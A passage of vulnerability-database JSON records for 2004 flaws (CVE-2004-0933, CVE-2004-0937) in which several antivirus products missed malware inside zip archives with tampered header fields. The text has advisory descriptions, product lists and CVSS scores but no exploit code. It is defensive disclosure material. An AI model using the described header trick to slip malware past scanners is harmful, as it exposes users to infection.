"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0933"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.3,
"url": "http://download.mcafee.com/uk/updates/updates.asp"
},
{
"trust": 0.3,
"url": "http://www.nod32.com/"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.ravantivirus.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "/archive/1/378660"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9363"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
},
{
"db": "NVD",
"id": "CVE-2004-0933"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-9363"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
},
{
"db": "NVD",
"id": "CVE-2004-0933"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-9363"
},
{
"date": "2004-10-18T00:00:00",
"db": "BID",
"id": "11448"
},
{
"date": "2004-10-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-311"
},
{
"date": "2005-01-27T05:00:00",
"db": "NVD",
"id": "CVE-2004-0933"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9363"
},
{
"date": "2009-07-12T08:06:00",
"db": "BID",
"id": "11448"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-311"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2004-0933"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": " Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-311"
}
],
"trust": 0.6
}
}
VAR-200502-0003
Vulnerability from variot - Updated: 2025-04-03 22:21Sophos Anti-Virus before 3.87.0, and Sophos Anti-Virus for Windows 95, 98, and Me before 3.88.0, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. Many anti-virus vendors have problems when processing .zip files. Remote attackers can use this vulnerability to embed malicious code to bypass the inspection of anti-virus software. The problem lies in the analysis of the header field of the .zip file. The information stored in the compressed file in the .zip file format is divided into two parts, one is the local (local) header field, and the other is the global (global) header field. Local header field data exists before the compressed data file, while global fields exist at the end of the .zip file. Attackers can modify the uncompressed byte size value of the archive file in the local and global header field information without affecting the function, but many antivirus vendors' software cannot handle such archive files well. If the compressed payload contains malicious code, it cannot be detected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200502-0003",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": "eq",
"trust": 1.6,
"vendor": "suse",
"version": "9.2"
},
{
"model": "small business suite",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "archive zip",
"scope": "eq",
"trust": 1.0,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "anti-virus d",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "antivirus rav antivirus for mail servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.4.2"
},
{
"model": "antivirus rav antivirus for file servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "1.0"
},
{
"model": "antivirus rav antivirus desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.6"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "5.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "4.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "3.0"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.013"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.012"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.011"
},
{
"model": "associates inoculateit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.1.13"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.3"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.2"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "archive::zip",
"scope": "eq",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "archive::zip",
"scope": "ne",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.14"
}
],
"sources": [
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
},
{
"db": "NVD",
"id": "CVE-2004-0937"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE Security Advisory\u203b labs@idefense.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0937",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2004-0937",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9367",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2004-0937",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#968818",
"trust": 0.8,
"value": "7.59"
},
{
"author": "CNNVD",
"id": "CNNVD-200502-042",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9367",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9367"
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
},
{
"db": "NVD",
"id": "CVE-2004-0937"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sophos Anti-Virus before 3.87.0, and Sophos Anti-Virus for Windows 95, 98, and Me before 3.88.0, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. \nThis issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. \nLatest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. Many anti-virus vendors have problems when processing .zip files. Remote attackers can use this vulnerability to embed malicious code to bypass the inspection of anti-virus software. The problem lies in the analysis of the header field of the .zip file. The information stored in the compressed file in the .zip file format is divided into two parts, one is the local (local) header field, and the other is the global (global) header field. Local header field data exists before the compressed data file, while global fields exist at the end of the .zip file. Attackers can modify the uncompressed byte size value of the archive file in the local and global header field information without affecting the function, but many antivirus vendors\u0027 software cannot handle such archive files well. If the compressed payload contains malicious code, it cannot be detected",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0937"
},
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "VULHUB",
"id": "VHN-9367"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9367",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9367"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818",
"trust": 2.5
},
{
"db": "NVD",
"id": "CVE-2004-0937",
"trust": 2.0
},
{
"db": "BID",
"id": "11448",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9367",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9367"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
},
{
"db": "NVD",
"id": "CVE-2004-0937"
}
]
},
"id": "VAR-200502-0003",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9367"
}
],
"trust": 0.725
},
"last_update_date": "2025-04-03T22:21:48.753000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Many anti-virus vendors software Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146859"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0937"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/968818"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.8,
"url": "http://www.linuxsecurity.com/advisories/gentoo_advisory-5043.html"
},
{
"trust": 0.8,
"url": "http://rt.cpan.org/noauth/bug.html?id=8077"
},
{
"trust": 0.8,
"url": "http://www.idefense.com/application/poi/display?id=153"
},
{
"trust": 0.3,
"url": "http://download.mcafee.com/uk/updates/updates.asp"
},
{
"trust": 0.3,
"url": "http://www.nod32.com/"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.ravantivirus.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp"
},
{
"trust": 0.3,
"url": "/archive/1/378660"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9367"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
},
{
"db": "NVD",
"id": "CVE-2004-0937"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9367"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
},
{
"db": "NVD",
"id": "CVE-2004-0937"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-12-10T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2005-02-09T00:00:00",
"db": "VULHUB",
"id": "VHN-9367"
},
{
"date": "2004-10-18T00:00:00",
"db": "BID",
"id": "11448"
},
{
"date": "2004-10-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200502-042"
},
{
"date": "2005-02-09T05:00:00",
"db": "NVD",
"id": "CVE-2004-0937"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-01-14T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9367"
},
{
"date": "2009-07-12T08:06:00",
"db": "BID",
"id": "11448"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200502-042"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2004-0937"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Anti-virus software may not properly scan malformed zip archives",
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200502-042"
}
],
"trust": 0.6
}
}
VAR-200501-0297
Vulnerability from variot - Updated: 2025-04-03 22:21McAfee Anti-Virus Engine DATS drivers before 4398 released on Oct 13th 2004 and DATS Driver before 4397 October 6th 2004 allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. A remote attacker can craft a malicious zip archive and send it a vulnerable user. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. This issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. Latest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. McAfee Anti-Virus is an antivirus software
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
